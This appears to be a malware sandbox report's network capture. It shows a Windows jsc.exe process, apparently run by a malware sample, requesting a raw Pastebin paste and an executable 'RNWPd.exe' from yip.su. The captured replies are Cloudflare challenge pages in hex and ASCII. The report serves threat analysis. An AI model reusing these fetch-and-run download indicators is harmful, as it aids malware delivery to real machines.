                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:10:37 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:10:37 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:10:37 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:10:37 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:10:37 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 33 32 31 34 34 27 2c 63 52 61 79 3a 20 27 38 62 34 63 66 65 63 35 37 65 65 63 63 33 35 62 27 2c 63 48 61 73 68 3a 20 27 64 32 37 65 30 33 35 62 63 61 34 66 31 65 32 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 70 46 2e 61 75 39 4b 4a 56 46 56 46 75 4c 79 5a 4c 72 67 6c 50 41 75 73 54 54 73 6a 78 75 76 32 45 51 79 30 35 32 2e 43 2e 76 51 2d 31 37 32 33 39 33 32 36 33 37 2d 30 2e 30 2e 31 2e 31 2d 34 31 31 36 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '32144',cRay: '8b4cfec57eecc35b',cHash: 'd27e035bca4f1e2',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=pF.au9KJVFVFuLyZLrglPAusTTsjxuv2EQy052.C.vQ-1723932637-0.0.1.1-4116",cFPWv: 'g',cTTim
                                    2024-08-17 22:10:37 UTC1369INData Raw: 51 77 44 6f 73 48 74 52 54 4f 5f 55 41 37 34 42 5f 45 42 58 48 64 76 64 2e 70 64 6c 50 67 55 76 59 44 34 5a 6b 51 4d 2e 37 54 30 63 72 61 62 53 36 54 75 36 6a 2e 44 46 47 67 76 48 5a 32 2e 49 34 67 61 4c 66 5f 50 34 64 67 67 70 78 30 6b 4d 64 74 78 62 46 42 50 70 50 76 2e 70 30 4d 63 58 72 31 64 70 33 56 54 66 74 36 61 78 45 58 64 76 4d 76 7a 77 55 30 52 6c 69 41 49 51 72 7a 35 31 7a 4e 34 74 31 68 4f 55 57 57 47 44 4e 61 36 75 68 43 69 5f 46 45 4a 4e 5a 70 41 38 72 49 78 4e 73 68 52 62 31 30 6b 58 61 54 63 6f 72 72 5a 64 5f 38 52 74 4c 57 5a 6e 6c 59 57 79 77 38 6d 4a 4f 57 71 5a 46 74 64 58 6e 37 79 50 34 53 76 72 6e 34 63 32 68 62 47 41 33 4c 51 61 57 71 75 5f 51 39 37 71 6d 52 66 77 4d 76 4a 61 6e 50 49 33 30 4e 39 30 63 56 33 49 31 4c 44 50 35 75 50
                                    Data Ascii: QwDosHtRTO_UA74B_EBXHdvd.pdlPgUvYD4ZkQM.7T0crabS6Tu6j.DFGgvHZ2.I4gaLf_P4dggpx0kMdtxbFBPpPv.p0McXr1dp3VTft6axEXdvMvzwU0RliAIQrz51zN4t1hOUWWGDNa6uhCi_FEJNZpA8rIxNshRb10kXaTcorrZd_8RtLWZnlYWyw8mJOWqZFtdXn7yP4Svrn4c2hbGA3LQaWqu_Q97qmRfwMvJanPI30N90cV3I1LDP5uP


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    54192.168.2.549780104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:10:42 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:10:42 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:10:42 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4cfee59c597292-EWR
                                    2024-08-17 22:10:42 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:10:42 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:10:42 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:10:42 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:10:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    55192.168.2.549781188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:10:42 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:10:42 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:10:42 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:10:42 UTC679INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 38 66 70 74 44 34 50 4b 78 35 4e 2f 43 4e 62 70 73 47 31 66 32 55 74 48 7a 49 36 2b 4f 36 75 36 35 4f 62 52 51 44 43 35 2b 70 79 6d 48 46 53 66 66 67 6a 30 74 54 4f 77 6f 38 56 49 67 64 4b 39 7a 46 75 48 63 63 71 51 31 4f 68 6a 6a 32 6c 64 46 67 36 6e 73 75 63 31 4e 38 6c 31 69 53 38 73 61 34 31 78 65 52 67 6b 65 75 38 3d 24 53 4b 57 65 52 56 50 69 46 75 4e 53 6a 66 67 4c 33 6a 43 64 77 41 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: 8fptD4PKx5N/CNbpsG1f2UtHzI6+O6u65ObRQDC5+pymHFSffgj0tTOwo8VIgdK9zFuHccqQ1Ohjj2ldFg6nsuc1N8l1iS8sa41xeRgkeu8=$SKWeRVPiFuNSjfgL3jCdwA==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:10:42 UTC1369INData Raw: 33 64 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3dfc<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:10:42 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:10:42 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:10:42 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:10:42 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:10:42 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 